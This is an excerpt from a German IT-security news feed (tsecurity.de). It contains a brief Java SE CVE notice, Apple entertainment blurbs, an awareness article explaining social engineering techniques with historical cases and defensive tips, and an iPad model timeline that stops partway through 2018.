<description><![CDATA[A vulnerability, which was classified as critical, has been found in Oracle Java SE 6u95/7u80/8u45. Affected by this issue is some unknown functionality of the component 2D. This manipulation causes information disclosure.

This vulnerability appears as CVE-2015-4760. The attack may be initiated ...]]></description>
<link>https://tsecurity.de/de/3672767/sicherheitsluecken/cve-2015-4760-oracle-java-se-6u957u808u45-2d-information-disclosure-rhsa-20151229-nessus-id-84930/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672767/sicherheitsluecken/cve-2015-4760-oracle-java-se-6u957u808u45-2d-information-disclosure-rhsa-20151229-nessus-id-84930/</guid>
<pubDate>Thu, 16 Jul 2026 10:09:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/oracle:java_se">Oracle Java SE 6u95/7u80/8u45</a>. Affected by this issue is some unknown functionality of the component <em>2D</em>. This manipulation causes information disclosure.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2015-4760">CVE-2015-4760</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ist dein Lieblingskünstler dabei? Die Top 20 auf Apple Music aller Zeiten]]></title>
<description><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></description>
<link>https://tsecurity.de/de/3669916/it-nachrichten/ist-dein-lieblingskuenstler-dabei-die-top-20-auf-apple-music-aller-zeiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669916/it-nachrichten/ist-dein-lieblingskuenstler-dabei-die-top-20-auf-apple-music-aller-zeiten/</guid>
<pubDate>Wed, 15 Jul 2026 09:47:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple Music hat die meistgestreamten Künstler*innen seit dem Start des Musikdienstes im Sommer 2015 veröffentlicht. Die Top 20 (via AppleInsider) vereint die größten Stars aus Hip-Hop, Pop, Rap und verwandten Genres.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV, Netflix und A24 zeigen ihre kommenden Filmstarts]]></title>
<description><![CDATA[Apple TV, Netflix und das US Filmstudio A24 haben neue Einblicke in drei kommende Produktionen veröffentlicht. Das Programm reicht von einer Actionkomödie über einen Psychothriller bis zu einem biografisch geprägten Drama über die Jugend des späteren Kochs und Autors Anthony Bourdain. „Mayday“ ab...]]></description>
<link>https://tsecurity.de/de/3669584/ios-mac-os/apple-tv-netflix-und-a24-zeigen-ihre-kommenden-filmstarts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669584/ios-mac-os/apple-tv-netflix-und-a24-zeigen-ihre-kommenden-filmstarts/</guid>
<pubDate>Wed, 15 Jul 2026 06:52:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/apple-tv-netflix-und-a24-zeigen-ihre-kommenden-filmstarts-283755/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/07/apple-tv-The-Whisper-Man-feature-2500-150x150.jpg" class="alignright tfe wp-post-image" alt="Apple Tv The Whisper Man Feature 2500" decoding="async"></a><p>Apple TV, Netflix und das US Filmstudio A24 haben neue Einblicke in drei kommende Produktionen veröffentlicht. Das Programm reicht von einer Actionkomödie über einen Psychothriller bis zu einem biografisch geprägten Drama über die Jugend des späteren Kochs und Autors Anthony Bourdain. „Mayday“ ab September auf Apple TV Apple TV zeigt „Mayday“ ab dem 4. September. […]</p>
<p>The post <a href="https://www.ifun.de/apple-tv-netflix-und-a24-zeigen-ihre-kommenden-filmstarts-283755/">Apple TV, Netflix und A24 zeigen ihre kommenden Filmstarts</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist Social Engineering?]]></title>
<description><![CDATA[Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.sp3n | shutterstock.com



Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit I...]]></description>
<link>https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</guid>
<pubDate>Wed, 15 Jul 2026 05:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/sp3n-shutterstock.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Puppet Master 16z9" class="wp-image-4006516" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.</figcaption></figure><p class="imageCredit">sp3n | shutterstock.com</p></div>



<p class="wp-block-paragraph">Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit Ihres Firmengebäudes alle Register ziehen – mit Hilfe von Social Engineering finden gewiefte Cyberkriminelle meistens einen Weg, diese Maßnahmen zu umgehen.</p>



<h2 class="wp-block-heading">Social Engineering – Definition</h2>



<p class="wp-block-paragraph"><a href="https://de.wikipedia.org/wiki/Social_Engineering_(Sicherheit)" title="Social Engineering" target="_blank" rel="noopener">Social Engineering</a> bezeichnet die “Kunst”, menschliche Schwächen auszunutzen, um sich Zugang zu Gebäuden, Systemen oder Daten zu verschaffen. Anstatt zu versuchen, eine Software-Schwachstelle zu finden und auszunutzen, wird ein Social Engineer beispielsweise einen Mitarbeiter anrufen und sich als IT-Support-Angestellter ausgeben, um ihn zur Herausgabe seines Passworts zu bewegen.</p>



<p class="wp-block-paragraph">Der bekannte Hacker Kevin Mitnick hat den Begriff Social Engineering in den 1990er Jahren entscheidend mitgeprägt. Die Grundidee, sich menschliches Verhalten zunutze zu machen und die Techniken dahinter, gibt es allerdings schon so lange, wie es Betrüger gibt.</p>



<h2 class="wp-block-heading">Social Engineering – Techniken</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2780856/social-engineering-angriffe-erkennen-und-verhindern.html" title="Social Engineering" target="_blank">Social Engineering</a> hat sich für Cyberkriminelle als besonders erfolgreich erwiesen, wenn es darum geht in Unternehmen einzudringen. Sobald ein Angreifer das Passwort eines vertrauenswürdigen Mitarbeiters erbeutet hat, kann er sich damit einloggen und sensible Daten auslesen. Mit einer Zugangskarte oder einem Code, der physischen Zugang gewährt, können Cyberkriminelle sogar noch größeren Schaden anrichten.</p>



<p class="wp-block-paragraph">Im Artikel “<a href="https://www.csoonline.com/article/2123704/social-engineering--anatomy-of-a-hack.html?nsdr=true" title="Social Engineering: Anatomy of a Hack" target="_blank">Social Engineering: Anatomy of a Hack</a>” beschreibt ein Penetrationtester, wie er aktuelle Ereignisse, öffentlich verfügbare Informationen aus sozialen Netzwerken und ein Hemd mit Cisco-Logo aus einem Second-Hand-Laden dazu nutzte, illegal in ein Unternehmen einzudringen. Das vier Dollar teure Gebrauchthemd half ihm, die Rezeptionisten und andere Mitarbeiter davon zu überzeugen, dass er im Auftrag von Cisco technischen Support leisten müsste. Einmal eingedrungen, war es für ihn ein Leichtes, auch anderen Teammitgliedern Zutritt zu verschaffen. Darüber hinaus gelang es dem <a href="https://www.computerwoche.de/article/2770285/was-ist-pentesting.html" title="Ethical Hacker" target="_blank">Ethical Hacker</a>, mehrere mit Malware verseuchte USB-Sticks in den Räumen zu platzieren und sich in das Unternehmensnetzwerk zu hacken. All das lief vor den Augen der Mitarbeiter ab.</p>



<p class="wp-block-paragraph">Um einen erfolgreichen Social-Engineering-Angriff zu fahren, müssen Sie nicht unbedingt zuerst in einen Second-Hand-Laden gehen, diese Angriffe funktionieren ebenso gut per E-Mail, Telefon oder über soziale Netzwerke. Allen Angriffsarten ist dabei gemein, dass sie menschliche Eigenschaften zu ihrem Vorteil nutzen – beispielsweise Gier, Angst, Neugier oder auch das Bedürfnis, anderen zu helfen.</p>



<p class="wp-block-paragraph">Cyberkriminelle nehmen sich dabei oft Wochen oder Monate Zeit, um ein Ziel auszukundschaften, bevor Sie einen persönlichen Besuch wagen, eine Nachricht senden oder einen Anruf tätigen. Zu den Vorbereitungen kann beispielsweise gehören, eine Telefonliste oder ein Organigramm des Zielunternehmens zu finden oder die Mitarbeiter über <a href="https://www.computerwoche.de/article/2752864/wenn-der-hacker-ueber-linkedin-kommt.html" title="soziale Netzwerke" target="_blank">soziale Netzwerke</a> zu recherchieren. Anschließend können Sie beispielsweise über folgende Wege aktiv werden.</p>



<ul class="wp-block-list">
<li><p><strong>Am Telefon:</strong> Ein Social Engineer könnte anrufen und vorgeben, ein Mitarbeiter oder eine vertrauenswürdige externe Autorität zu sein (zum Beispiel ein Strafverfolgungsbeamter oder ein Wirtschaftsprüfer).</p></li>



<li><p><strong>Im Büro:</strong>“Können Sie mir die Tür aufhalten? Ich habe meinen Schlüssel/ meine Zugangskarte vergessen.” Diesen Satz haben Sie sicher auch schon einmal so vernommen. Auch wenn die fragende Person nicht verdächtig erscheinen mag – das ist eine beliebte Taktik beim Social Engineering.</p></li>



<li><p><strong>Online:</strong> Soziale Netzwerke erleichtern es, Social-Engineering-Angriffe zu fahren. Über Plattformen wie LinkedIn lassen sich schnell und einfach die meisten Mitarbeiter eines Unternehmens finden. Oft kommen noch viele andere Informationen dazu, die unter Umständen für weitere Angriffe nützlich sein können.</p></li>
</ul>



<p class="wp-block-paragraph">Beim Social Engineering werden regelmäßig auch aktuelle Ereignisse, Feiertage oder auch Popkultur-Phänomene dazu eingesetzt, Opfer in die Falle zu locken. Dabei passen die Cyberkriminellen ihre Phishing-Angriffe so an, dass sie auf bestimmte Interessen (Musik, Sport, Politik, etc.) abzielen. Das erhöht die Chance, dass die mit <a href="https://www.computerwoche.de/article/2800283/das-kleine-abc-der-schadsoftware.html" title="Malware" target="_blank">Malware</a> verseuchten Anhänge angeklickt werden.</p>



<h2 class="wp-block-heading">Social Engineering – Angriffsformen</h2>



<ul class="wp-block-list">
<li><p><strong>Phishing-Angriffe</strong> (zu denen auch SMS-basierte <a title="Smishing" href="https://www.computerwoche.de/article/2796003/wie-phishing-per-sms-funktioniert.html" target="_blank">Smishing</a>– und Voice-basierte <a title="Vishing-Attacken" href="https://www.computerwoche.de/article/2796419/wie-phishing-per-telefon-funktioniert.html" target="_blank">Vishing-Attacken</a> zählen) sind oft mit geringem Aufwand verbunden. Das Motto: “Die Masse macht’s”. Im Rahmen von Phishing-Kampagnen werden oft Tausende identischer E-Mails verschickt. Anschließend müssen die Angreifer nur noch darauf warten, dass jemand leichtgläubig genug ist, um auf den enthaltenen Anhang zu klicken.</p></li>



<li><p><strong>Spear Phishing</strong> oder auch Whaling bezeichnet Phishing-Angriffe, die ganz bewusst <a title="hochrangige Ziele ins Visier nehmen" href="https://www.csoonline.com/article/3491895/e-mail-sicherheit-die-psychotricks-der-spear-phishing-betruger.html" target="_blank">hochrangige Ziele ins Visier nehmen</a>. Spear-Phishing-Angreifer verbringen im Regelfall viel Zeit damit, solche Ziele zunächst auszukundschaften. Das Ziel besteht dabei darin, einen möglichst überzeugenden, personalisierten Scam auf die Beine zu stellen.</p></li>



<li><p><strong>Baiting</strong> ist ein essenzieller Bestandteil aller Phishing-Formen – und anderen Betrügereien. Es bezeichnet die Verlockung, mit der die Ziele in Versuchung geführt werden – sei es eine SMS, die kostenlose Geschenkkarten verspricht oder eine E-Mail, die Kryptowährungen zu besonders attraktiven Preisen oder gar kostenlos in Aussicht stellt.</p></li>



<li><p>Beim <strong>Pretexting</strong> handelt es sich um eine <a title='betrügerische Form von "Storytelling"' href="https://www.computerwoche.de/article/2803547/was-ist-pretexting.html" target="_blank">betrügerische Form von “Storytelling”</a>. Die dabei erfundene Geschichte soll das Opfer zum Beispiel dazu bewegen, persönliche Informationen oder Zugangsdaten preiszugeben. Weiß ein Angreifer beispielsweise, bei welcher Bank sein Opfer Kunde ist, könnte er sich als Mitarbeiter des Kundendiensts ausgeben und unter einem Vorwand wie “Zahlungsverzug” versuchen, Finanzinformationen zu erhalten.</p></li>



<li><p><strong>Business Email Compromise</strong> (BEC), auch bekannt als <a title="CEO-Fraud" href="https://www.computerwoche.de/article/2765169/wenn-hacker-chef-spielen.html" target="_blank">CEO-Fraud</a>, kombiniert mehrere der bislang genannten Techniken. Ein Angreifer erlangt entweder die Kontrolle über die E-Mail-Adresse eines Opfers oder schafft es, E-Mails zu versenden, die so aussehen, als kämen sie von dieser legitimen Adresse. Damit kontaktieren die Angreifer die Untergebenen des Angegriffenen in seinem Namen und ordnen beispielsweise dringliche Überweisungen an.</p></li>



<li><p><strong>Tailgating</strong> ist eine physische Social-Engineering-Form, bei der Angreifer den Mitarbeitern eines Unternehmens <a title="ins Firmengebäude folgen" href="https://www.csoonline.com/article/3493920/10-essenzielle-masnahmen-fur-physische-sicherheit.html" target="_blank">ins Firmengebäude folgen</a>. Dazu könnten diese sich beispielsweise als Lieferant oder neuer Mitarbeiter, der den Ausweis vergessen hat, ausgeben.</p></li>
</ul>



<h2 class="wp-block-heading">Social Engineering – Beispiele</h2>



<p class="wp-block-paragraph">Um ein Gefühl dafür zu bekommen, auf welche Social-Engineering-Taktiken Sie besonders achten sollten, empfiehlt sich ein Blick auf erfolgreiche Angriffe der Vergangenheit. Hierbei konzentrieren wir uns auf drei spezifische Social-Engineering-Angriffe, die für Cyberkriminelle besonders einträglich ausgefallen sind:</p>



<p class="wp-block-paragraph"><strong>1. Etwas Verlockendes anbieten</strong></p>



<p class="wp-block-paragraph">Jeder Trickbetrüger weiß: Am einfachsten ist es, aus der menschlichen Gier Profit zu schlagen. Das bildet die Grundlage des klassischen <a href="https://www.computerwoche.de/article/2600682/insider-chat-mit-einem-online-betrueger.html" title="nigerianischen 419-Scams" target="_blank">nigerianischen 419-Scams</a>: Hierbei gaukeln Betrüger ihren Opfern vor, sie müssten hohe, unrechtmäßig erworbene Geldsummen aus dem eigenen Land zu einer sicheren Bank im Ausland transferieren. Dazu bräuchten sie Unterstützung: Gegen die Zahlung vermeintlicher Provisions-, Verwaltungs- oder Versicherungsgebühren könnten die Opfer einen Gutteil des oft millionenschweren Geldbetrags abbekommen, so dass betrügerische Versprechen. </p>



<p class="wp-block-paragraph">Angriffe dieser Art sind seit Jahrzehnten bekannt und eigentlich eine Lachnummer, aber nichtsdestotrotz immer noch eine effektive Social-Engineering-Technik, auf die Menschen hereinfallen: Im Jahr 2007 überwies der Schatzmeister eines dünn besiedelten Bezirks im US-Bundesstaat Michigan einem solchen Betrüger <a href="https://www.cfo.com/risk-compliance/2007/06/treasurer-steals-to-pay-for-e-mail-scam/" title="1,2 Millionen Dollar an öffentlichen Geldern" target="_blank" rel="noopener">1,2 Millionen Dollar an öffentlichen Geldern</a> – in der Hoffnung abkassieren zu können. </p>



<p class="wp-block-paragraph">Ein weiterer gängiger Köder ist die Aussicht auf einen neuen, besseren Job: Im Rahmen einer äußerst peinlichen Kompromittierung traf es im Jahr 2011 das Sicherheitsunternehmen RSA auf diese Weise. Mindestens zwei Mitarbeiter öffneten eine Malware-verseuchte Datei, die <a href="https://www.networkworld.com/article/697270/malware-cybercrime-was-this-the-email-that-took-down-rsa.html" title="an eine Phishing-E-Mail angehängt war" target="_blank">an eine Phishing-E-Mail angehängt war</a>. Der Dateiname: “2011 recruitment plan.xls”.</p>



<p class="wp-block-paragraph"><strong>2. Fake it till you make it</strong></p>



<p class="wp-block-paragraph">Eine der simpelsten – und überraschenderweise auch erfolgreichsten – Social-Engineering-Techniken besteht darin, sich als ratlosen Mitarbeiter auszugeben. Bei einem seiner legendären frühen Betrugsversuche verschaffte sich Kevin Mitnick Zugang zu den Betriebssystem-Entwicklungsservern der <a href="http://passwordresearch.com/stories/story47.html" title="Digital Equipment Corporation" target="_blank" rel="noopener">Digital Equipment Corporation</a>. Sein Vorgehen: Er rief bei DEC an, gab sich als leitender Entwickler aus und behauptete, er habe Probleme mit dem Login. Er wurde postwendend mit neuen Logindaten versorgt. Das spielte sich schon 1979 ab – man sollte also meinen, die Dinge hätten sich seitdem verbessert. Das ist allerdings nicht der Fall: Im Jahr 2016 erlangte ein Hacker <a href="https://www.nytimes.com/2016/02/09/us/hackers-access-employee-records-at-justice-and-homeland-security-depts.html" title="die Kontrolle über ein E-Mail-Konto" target="_blank" rel="noopener">die Kontrolle über ein E-Mail-Konto</a> des US-Justizministeriums und nutzte es, um sich wie seinerzeit Mitnick Zugangsdaten zu verschaffen. </p>



<p class="wp-block-paragraph">Zwar haben viele Organisationen Barrieren aufgebaut, die diese Art des dreisten Betrugs verhindern sollen, aber oft ist es nicht besonders schwer, sie zu umgehen. Als Hewlett-Packard (HP) im Jahr 2005 <a href="https://www.welt.de/print-welt/article155234/HP-Chef-gesteht-Verwicklung.html" title="Privatdetektive damit beauftragte " target="_blank" rel="noopener">Privatdetektive damit beauftragte </a>herauszufinden, welche Vorstandsmitglieder Informationen an die Presse durchstachen, versorgte das Unternehmen die Schnüffler mit den letzten vier Ziffern der Sozialversicherungsnummer ihrer Zielpersonen. Diese Daten akzeptierte der technische Support von HPs TK-Provider AT&amp;T als Identitätsnachweis und händigte den Detektiven detaillierte Anrufprotokolle aus.</p>



<p class="wp-block-paragraph"><strong>3. Autorität spielen</strong></p>



<p class="wp-block-paragraph">Viele Menschen sind daran gewöhnt, Autoritäten zu respektieren. Das wissen auch Cyberkriminelle. Sie spielen sich als Vorgesetzte oder Führungskräfte aus, um an ihr Ziel zu gelangen. So überwiesen im Jahr 2015 Finanzmitarbeiter von Ubiquiti Networks Firmengelder in Millionenhöhe <a href="https://krebsonsecurity.com/2015/08/tech-firm-ubiquiti-suffers-46m-cyberheist/" title="an Social-Engineering-Betrüger" target="_blank" rel="noopener">an Social-Engineering-Betrüger</a>, die sich als Führungskräfte des Unternehmens ausgegeben und ihre Glaubwürdigkeit mit gefälschten E-Mail-Absendern unterstrichen hatten. </p>



<p class="wp-block-paragraph">Ein anderes Beispiel: Zur Jahrtausendwende gehörte es für (manche) britische Boulevard-Journalisten zum guten Ton, sich Zugang zu den Voicemail-Konten von für sie interessanten Personen zu verschaffen. So überzeugte ein Journalist den TK-Anbieter Vodafone davon, die Voicemail-PIN <a href="https://www.theguardian.com/uk/2011/apr/05/sienna-miller-wins-court-order-for-phone-data" title="der Schauspielerin Sienna Miller zurückzusetzen" target="_blank" rel="noopener">der Schauspielerin Sienna Miller zurückzusetzen</a>, indem er dort anrief und sich als “Kollege John aus der Credit-Control-Abteilung” ausgab. </p>



<p class="wp-block-paragraph">Ein weiteres prominentes Beispiel ist John Podesta, Hillary Clintons ehemaliger Wahlkampfleiter, der 2016 von russischen Spionen gehackt wurde. Die Cyberkriminellen hatten ihm im Vorfeld eine Phishing-E-Mail zugestellt, die als Nachricht von Google getarnt war und <a href="https://www.cbsnews.com/news/the-phishing-email-that-hacked-the-account-of-john-podesta/" title="eine Aufforderung enthielt, sein Passwort zurückzusetzen" target="_blank" rel="noopener">eine Aufforderung enthielt, sein Passwort zurückzusetzen</a>. Statt sein Konto zu schützen, gab er damit seine Anmeldedaten preis.</p>



<h2 class="wp-block-heading">Social Engineering – Zahlen &amp; Statistiken</h2>



<ul class="wp-block-list">
<li><p>Allein im Jahr 2024 konnten kriminelle Hacker durch BEC-Angriffe rund <strong>6,3 Milliarden Dollar</strong> einstreichen. (Quelle: <a href="https://www.verizon.com/business/resources/reports/2025-dbir-data-breach-investigations-report.pdf" target="_blank" rel="noreferrer noopener">Verizon DBIR 2025</a>)</p></li>



<li><p>Smishing macht <strong>39 Prozent</strong> aller mobilen Bedrohungen aus. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit der Einführung von ChatGPT stieg die Zahl der Social-Engineering-Angriffe <strong>um 45 Prozent</strong>. (Quelle: <a title="SlashNext" href="https://slashnext.com/state-of-phishing-2023/" target="_blank" rel="noopener">SlashNext</a>)</p></li>



<li><p>Mit 17 Prozent aller Kompromittierungen ist Phishing der <strong>zweithäufigste, initiale Malware-Infektionsvektor</strong>. (Quelle: Mandiant <a title="M-Trends-Report 2024" href="https://cloud.google.com/security/resources/m-trends" target="_blank" rel="noopener">M-Trends-Report 2024</a>)</p></li>
</ul>



<h2 class="wp-block-heading">Social-Engineering-Angriffe abwehren</h2>



<p class="wp-block-paragraph">Wir haben fünf Tipps zur Abwehr von Social-Engineering-Attacken für Sie zusammengestellt:</p>



<p class="wp-block-paragraph"><strong>1. Security Awareness</strong></p>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2785239/security-awareness-richtig-planen-und-vermitteln.html" title="Security-Awareness-Schulungen" target="_blank">Security-Awareness-Schulungen</a> sind der beste Weg, um Social Engineering zu verhindern. Nur wenn die Mitarbeiter wissen, welche Gefahr ihnen droht, können sie sich gegen solche Angriffe wappnen. Erarbeiten Sie ein umfassendes Schulungsprogramm, dass zu mehr Sicherheitsbewusstsein führt! Es sollte regelmäßig aktualisiert werden, um sowohl allgemeinen Phishing-Bedrohungen als auch neuen, <a href="https://www.computerwoche.de/article/2798234/neue-wege-zum-phishing-erfolg.html" title="gezielten Bedrohungen" target="_blank">gezielten Bedrohungen</a> angemessen begegnen zu können. </p>



<p class="wp-block-paragraph">Dabei sollten Sie von einer tiefgehenden Erklärung technischer Schwachstellen und Details absehen und stattdessen Beispiele nennen, die die Methoden der Angreifer in den Fokus stellen. Auch interaktive Elemente wie ein Quiz können dazu beitragen, Mitarbeiter vorzubereiten.</p>



<p class="wp-block-paragraph"><strong>2. Security-Briefing für Mitarbeiter in Schlüsselpositionen</strong></p>



<p class="wp-block-paragraph">Unternehmen sollten Führungskräfte und leitende Angestellte in ihre Bemühungen einbeziehen, da sie für Cyberkriminelle die <a href="https://www.computerwoche.de/a/so-werden-ceos-hereingelegt,3256518" title="attraktivsten Social-Engineering-Ziele" target="_blank">attraktivsten Social-Engineering-Ziele</a> darstellen. Wichtig ist es auch Mitarbeiter, die die Berechtigung zu Finanztransaktionen haben, regelmäßig über <a href="https://www.cio.de/a/wenn-hacker-chef-spielen,3331676" title="die Gefahren aufzuklären" target="_blank">die Gefahren aufzuklären</a>.</p>



<p class="wp-block-paragraph"><strong>3. Bestehende Prozesse prüfen</strong></p>



<p class="wp-block-paragraph">Für finanzielle und andere wichtige Transaktionen bietet es sich an, zusätzliche Kontrollmaßnahmen einzuziehen. Dabei gilt es im Auge zu behalten, dass einige Schutzmaßnahmen, beispielsweise eine Aufgabentrennung, sinnlos werden könnten, wenn es sich um eine <a href="https://www.computerwoche.de/article/2772542/mitarbeiter-die-zu-innentaetern-wurden.html" title="Insider-Bedrohung" target="_blank">Insider-Bedrohung</a> handelt. Eine regelmäßige Risikoanalyse ist zu empfehlen.</p>



<p class="wp-block-paragraph"><strong>4. Neue Richtlinien für dringende Anfragen</strong></p>



<p class="wp-block-paragraph">Sendet der Vorstandsvorsitzende eine E-Mail von seinem Gmail-Konto, sollte das bei den Mitarbeitern Alarmsignale auslösen. Um vorschnelle Reaktionen zu vermeiden, die ins Unglück führen können, sollten Mitarbeiter ein klar definiertes Notfallverfahren an die Hand bekommen und im Zweifel direkt mit dem Absender kommunizieren können.</p>



<p class="wp-block-paragraph"><strong>5. Incident Management</strong></p>



<p class="wp-block-paragraph">Überprüfen, verfeinern und testen Sie regelmäßig Ihre Incident-Management-Systeme. Dazu bieten sich Übungen mit der Geschäftsleitung und den wichtigsten Mitarbeitern an, in denen Kontrollmechanismen und potenzielle Schwachstellen auf den Prüfstand kommen.</p>



<h2 class="wp-block-heading">Social Engineering – Toolkits</h2>



<p class="wp-block-paragraph">Es gibt am Markt einige Tools und Services, die Unternehmen bei Awareness-Kampagnen und Phishing-Simulationen unterstützen:</p>



<ul class="wp-block-list">
<li><p>Das <a title="Social Engineering Toolkit" href="https://github.com/trustedsec/social-engineer-toolkit" target="_blank" rel="noopener">Social Engineering Toolkit</a> von TrustedSec steht als kostenloser Download zur Verfügung und hilft bei der Automatisierung von Penetrationstests. Zu den Features gehören neben Social Engineering auch Spear Phishing, Fake Websites und USB-basierte Angriffe.</p></li>



<li><p>Das <a title="Social Engineering Framework" href="https://www.social-engineer.org/framework/general-discussion/" target="_blank" rel="noopener">Social Engineering Framework</a> ist eine weitere gute Ressource. Laut Aussage der Macher enthält es “aktuelle wissenschaftliche, technische und psychologische Informationen” zum Thema. Das Ziel sei es, “eine Informationssammlung für Sicherheitsexperten, Penetrationstester und Enthusiasten zu schaffen”. Das Framework wird regelmäßig aktualisiert.</p></li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.csoonline.com/article/571993/social-engineering-definition-examples-and-techniques.html" target="_blank">im Original</a> bei unserer Schwesterpublikation CSOonline.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPad Generations List: Every Apple Model from 2010 to 2026]]></title>
<description><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple ...]]></description>
<link>https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</guid>
<pubDate>Tue, 14 Jul 2026 18:34:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple mixes “iPad,” “iPad Air,” “iPad mini,” and “iPad Pro,” plus year/generation numbers. We’ll spell out each clearly.



Ports &amp; Pencils change a lot. 30-pin → Lightning → USB-C; Apple Pencil (1st) → Pencil (2nd) → Pencil (USB-C) → Pencil Pro.



Sizes shift. Classic 9.7-inch gave way to 10.2, 10.5, 10.9, 11, 12.9, 13 inches—and a tiny 7.9/8.3-inch mini.



Chips leap. A-series to Apple silicon (M-series) with desktop-class features.




The iPad Timeline, Every Generation, In Order



2010 — iPad (1st generation)







The original iPad landed like a new kind of computer: a 9.7-inch multi-touch slab running iPhone OS 3.2 on Apple’s A4 chip. No cameras, a 30-pin dock connector, and a 1024×768 IPS screen—but a bold idea: web, email, books, and apps in your hands. It sold millions and cemented the tablet as a mainstream device. 



2011 — iPad 2







A landmark refinement: 33% thinner, lighter, now with front and rear cameras, the new A5 chip, and the magnetic Smart Cover that woke the iPad when opened. Same 9.7-inch resolution, much faster feel. This design ethos—thinner, lighter, smarter—became iPad’s north star. 



2012 (Spring) — iPad (3rd generation)







“The new iPad” debuted the Retina display at 2048×1536—stunning at the time—powered by A5X for the heavier graphics load. It also added LTE options. Short life, huge impact: Retina became the baseline for Apple screens. 



2012 (Fall) — iPad (4th generation)







A fast mid-year pivot brought the A6X chip and, crucially, Lightning replacing the 30-pin connector—aligning iPad with the iPhone 5 ecosystem and opening an era of smaller, reversible cables. 



2012 — iPad mini (1st generation)







A beloved 7.9-inch form factor appeared with an A5 chip and a 1024×768 display. The mini made iPad one-handable and travel-friendly; its size would become a cult favorite for reading and fieldwork. 



2013 — iPad Air (1st generation)







The “Air” name said it all: a dramatically lighter 9.7-inch chassis with A7 (64-bit), ushering in desktop-style architectures on iPad. Sleek, efficient, future-proof. 



2013 — iPad mini 2 (Retina)







The mini caught up with Retina and A7 performance, shrinking few-compromise iPad power into a small body. (Mini 3 in 2014 added Touch ID but kept similar internals.)



2014 — iPad Air 2







The first laminated display with anti-reflective coating, a big visual upgrade, plus the A8X chip and Touch ID. Air 2 stayed relevant for years—many still consider it a classic. 



2015 — iPad mini 4







A meaningful update with a thinner build and A8; it became the long-lived “good enough” mini while Pro development accelerated.



2015 — iPad Pro 12.9 (1st generation)







iPad grew up—literally—with a 12.9-inch display, quad speakers, A9X, and two accessories that redefined the platform: Apple Pencil (1st gen) and Smart Keyboard. Creative pros and note-takers took notice; latency and precision changed the conversation about tablets. 



2016 — iPad Pro 9.7







A smaller Pro introduced True Tone and a color-sensitive ambient sensor—Apple’s screens started adapting to your environment. Cameras also leapt ahead here.



2017 — iPad (5th generation)







Apple rebooted the entry iPad: affordable 9.7-inch model with A9. No Pencil support yet, but it set a template for the value tier. 



2017 — iPad Pro 10.5 &amp; 12.9 (2nd gen)







ProMotion 120Hz arrived, making iPad feel instantly smoother—scrolling, gaming, Pencil latency, everything. It’s one of the biggest “you can feel it” upgrades in iPad history. 



2018 — iPad (6th generation)







